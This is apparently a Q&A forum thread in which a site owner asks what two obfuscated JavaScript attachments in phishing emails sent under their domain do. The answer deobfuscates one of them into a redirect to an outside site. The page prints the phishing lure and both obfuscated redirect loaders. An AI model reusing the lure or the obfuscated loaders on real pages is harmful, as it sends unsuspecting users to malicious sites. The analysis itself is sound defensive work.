Home/ Questions/Q 840103
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-15T05:34:18+00:00

I’ve just found out that a spammer is sending email from our domain name,

  • 0

I’ve just found out that a spammer is sending email from our domain name, pretending to be us, saying:

Dear Customer,

This e-mail was send by ourwebsite.com
to notify you that we have temporanly
prevented access to your account.

We have reasons to beleive that your
account may have been accessed by
someone else. Please run attached file
and Follow instructions.

(C) ourwebsite.com (I changed that)

The attached file is an HTML file that has the following javascript:

<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>

Another email had this:

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it …

Thanks

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Answer:

    The script executes

    document.location.href = "http://mvblaw.com/z.htm";    //Evil site (I assume)

    It also contains a large number of useless lines to hide the script’s true purpose.

    Analysis

    Here it is unpacked.

    function mD() {};
this.aB = 43719;
mD.prototype = {
    i: function () {
        var w = new Date();
        this.j = '';
        var x = function () {};
        var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
        var d = new Date();
        y = "";
        aL = "";
        var f = document;
        var s = function () {};
        this.yE = "";
        aN = "";
        var dL = '';
        var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
        this.v = "v";
        var q = 27427;
        var m = new Date();
        iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
        dE = '';
        k = "";
        var qY = function () {};
    }
};
xO = false;
var b = new mD();
yY = "";
b.i();
this.xT = '';

    Cleaning up the obfuscations and adding meaningful names, it becomes

    function TempClass() {};
this.aB = 43719;
TempClass.prototype = {
    doIt: function () {
        var w = new Date();
        this.j = '';
        var x = function () {};
        var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)

        var d = new Date();
        y = "";
        aL = "";
        var f = document;
        var s = function () {};
        this.yE = "";
        aN = "";
        var dL = '';
        var iD = f['location'];
        this.v = "v";
        var q = 27427;
        var m = new Date();
        iD['href'] = a;
        dE = '';
        k = "";
        var qY = function () {};
    }
};
xO = false;
var b = new TempClass();
yY = "";
b.doIt();
this.xT = '';

    Removing all of the useless lines, it becomes

    function TempClass() {};

TempClass.prototype = {
    doIt: function () {
        var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)

        var f = document;
        var iD = f['location'];
        iD['href'] = a;
    }
};

var b = new TempClass();
b.doIt();
    • 0